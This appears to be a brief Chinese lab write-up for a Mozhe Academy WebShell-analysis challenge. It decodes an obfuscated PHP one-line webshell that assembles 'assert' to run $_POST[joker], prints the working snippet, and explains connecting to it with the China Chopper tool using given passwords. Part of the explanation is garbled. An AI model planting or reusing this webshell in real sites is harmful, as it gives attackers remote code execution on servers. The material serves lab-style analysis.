墨者学院 - WebShell代码分析溯源(第3题)
发布时间
阅读量:
阅读量
g是个数组,根据ASCll码对应表可以得到g[1]='s',chr('116')='t',那么gg=assert,@gg(_POST[joker])不就是assert(_POST[joker]),组成了我们常见的一句话脚本
运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get
html路径下拿到key
<?php
error_reporting(0);
$g = array('','s');
$gg = a.$g[1].ser.chr('116');
@$gg($_POST[joker]);
?>
菜刀连接用法: http://www.xxx.com/2.php
密码: joker
详解:$ g是个数组,g[1]=′s′,chr(′116′)=′t′,(),这样的g[1]=′s′,chr(′116′)=′t′,(),这样的gg=
assert,@gg(gg(_POST[joker])不就是assert($_POST[joker]),是我们常见的一句话木马,直接菜刀链接即可
全部评论 (0)
还没有任何评论哟~